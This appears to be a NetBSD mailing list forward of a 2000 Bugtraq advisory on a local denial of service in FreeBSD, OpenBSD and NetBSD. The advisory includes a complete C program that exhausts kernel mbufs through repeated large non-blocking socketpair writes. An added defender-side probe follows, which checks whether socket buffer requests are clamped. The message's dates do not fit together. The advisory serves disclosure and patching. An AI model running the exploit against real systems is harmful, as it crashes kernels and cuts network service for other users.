Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability (fwd)
To: None <tech-security@netbsd.org>
From: None <abs@mono.org>
List: tech-security
Date: 06/03/2000 14:56:30
Message-ID: <Pine.NEB.4.21.0006031456050.353-100000@oblivion.mono.org>

	FYI (I know most people will have seen it on bugtraq anyway)


		David/absolute
				       -- www.netbsd.org: No hype required --

---------- Forwarded message ----------
Date: Wed, 2 Aug 2000 08:41:53 -0300
From: Ussr Labs <labs@USSRBACK.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
Subject: Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability


Local FreeBSD, Openbsd, NetBSD, DoS Vulnerability


Release Date:
April 29, 2000

Systems Affected:
FreeBSD 3.3-RELEASE
FreeBSD 4.0-RELEASE
FreeBSD 5.0 (maybe)
OpenBSD 2.5
OpenBSD 2.6
OpenBSD 2.7 (maybe)
NetBSD  1.4.1



THE PROBLEM

From an original posting made about last September by Sven Berkenvs
(sven@ILSE.NL) to bugtraq:


--- Forward ---

I stumbled across a denial of service attack on FreeBSD systems, where an
unprivileged user can panic the kernel. Quick and dirty testing (code
attached at the end of this mail) showed OpenBSD is vulnerable too:

FreeBSD 3.2-RELEASE: the kernel panics. I haven't had a chance to test it
on older FreeBSD versions.

OpenBSD 2.4 (GENERIC kernel) and OpenBSD 2.5-current with
NMBSCLUSTERS=8192: the kernel logs one "/bsd: mb_map full" and all
processes trying to send something over the network get stuck waiting in
mbuf. Locally the system continues to function. Tested by a friend.

NetBSD: not available, but it is highly probable that the affected code
in OpenBSD is from its parent NetBSD.

--- End of Forward ---

Upon testing this code on the new versions of *BSD the exploit still
works.

FreeBSD - 3.3-RELEASE: reboots the PC
FreeBSD - 4.0-RELEASE and 4.0-STABLE as of May 25, 2000: the logs
	receive "/kernel: xl0: no memory for rx list -- packet dropped!";
	all network connections are dead and the route table is a mess.
FreeBSD - 5.0-Current: untested
OpenBSD - 2.5 (with NMBCLUSTERS=8192): mb_map full
OpenBSD - 2.6 (with patches up to May 25, 2000): mb_map full
OpenBSD - 2.7: untested
NetBSD - 1.4.1: "/netbsd: WARNING: mclpool limit reached; increase NMBCLUS";
	the network connection is dead.
NetBSD - 1.4.2: untested

From what I have tested on, Linux does not have any issue with this piece
of code. As for the other Unices, they have not been tested.

THE CODE

The original code written by Sven Berkenvs that causes this:

#include        <stdlib.h>      /* exit() */
#include        <unistd.h>
#include        <sys/socket.h>
#include        <fcntl.h>

#define         BUFFERSIZE      204800

extern  int
main(void)
{
        int             p[2], i;
        char            crap[BUFFERSIZE];

        /* Keep creating socket pairs until the kernel refuses one
         * (descriptor limit reached or no resources left). */
        while (1)
        {
                if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
                        break;
                /* Ask for large send and receive buffers on both ends. */
                i = BUFFERSIZE;
                setsockopt(p[0], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[0], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_RCVBUF, &i, sizeof(int));
                setsockopt(p[1], SOL_SOCKET, SO_SNDBUF, &i, sizeof(int));
                /* Non-blocking, so each write fills the buffer and returns
                 * instead of waiting for a reader. */
                fcntl(p[0], F_SETFL, O_NONBLOCK);
                fcntl(p[1], F_SETFL, O_NONBLOCK);
                write(p[0], crap, BUFFERSIZE);
                write(p[1], crap, BUFFERSIZE);
        }
        exit(0);
}


Underground Security Systems Research
http://www.ussrback.com

Greetings:
Eeye, Attrition, w00w00, beavuh, Rhino9, SecurityFocus.com, ADM, HNN,
Sub, prizm, b0f,Technotronic and Rfp.

Disclaimer:
The information within this paper may change without notice. Use of
this information constitutes acceptance for use in an AS IS
condition. There are NO warranties with regard to this information.
In no event shall the author be liable for any damages whatsoever
arising out of or in connection with the use or spread of this
information. Any use of this information is at the user's own risk.

Feedback:
Please send suggestions, updates, and comments to:

Underground Security Systems Research
mail:labs@ussrback.com
http://www.ussrback.com

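A defender-side check, added here and not part of the advisory or of Ussr Labs' or Sven Berkenvs' code: it requests the same 204800-byte buffer on a single AF_UNIX socketpair and reads back what the kernel actually granted, so an administrator can confirm whether unprivileged buffer requests are clamped to the system maximum (kern.ipc.maxsockbuf on FreeBSD). The function and constant names are my own.

```c
/* Added example, not part of the advisory: request the advisory's 204800-byte
 * socket buffer on one end of an AF_UNIX socketpair and read back what the
 * kernel granted. setsockopt() can succeed while silently capping the value,
 * so getsockopt() is the only reliable readback. */
#include <stdio.h>
#include <sys/socket.h>
#include <unistd.h>

#define REQUESTED_BUFFERSIZE 204800  /* value used by the advisory's code */

/* Request `requested` bytes for socket option `opt` (SO_SNDBUF or SO_RCVBUF)
 * on one end of a fresh socketpair; store the kernel's reported size in
 * *granted. Returns 0 on success, -1 on failure (errno set by the failing call). */
int probe_sockbuf(int opt, int requested, int *granted)
{
    int p[2], rc = -1;
    int val = requested;
    socklen_t len = sizeof(val);
    if (socketpair(AF_UNIX, SOCK_STREAM, 0, p) == -1)
        return -1;
    if (setsockopt(p[0], SOL_SOCKET, opt, &val, sizeof(val)) == 0 &&
        getsockopt(p[0], SOL_SOCKET, opt, &val, &len) == 0) {
        *granted = val;
        rc = 0;
    }
    close(p[0]);
    close(p[1]);
    return rc;
}

/* 1 if the kernel granted less than requested, 0 otherwise. Linux reports
 * double the requested size for its own bookkeeping (see socket(7)), so
 * there compare against the documented limit rather than the request. */
int sockbuf_is_clamped(int requested, int granted)
{
    return granted < requested;
}

int main(void)
{
    int granted;
    if (probe_sockbuf(SO_SNDBUF, REQUESTED_BUFFERSIZE, &granted) == -1) {
        perror("probe_sockbuf");
        return 1;
    }
    printf("SO_SNDBUF: requested %d, granted %d (%s)\n", REQUESTED_BUFFERSIZE,
           granted, sockbuf_is_clamped(REQUESTED_BUFFERSIZE, granted) ? "clamped" : "not clamped");
    return 0;
}
```

Run it as an unprivileged user; a granted value far above the system's configured socket buffer maximum is the condition the advisory describes.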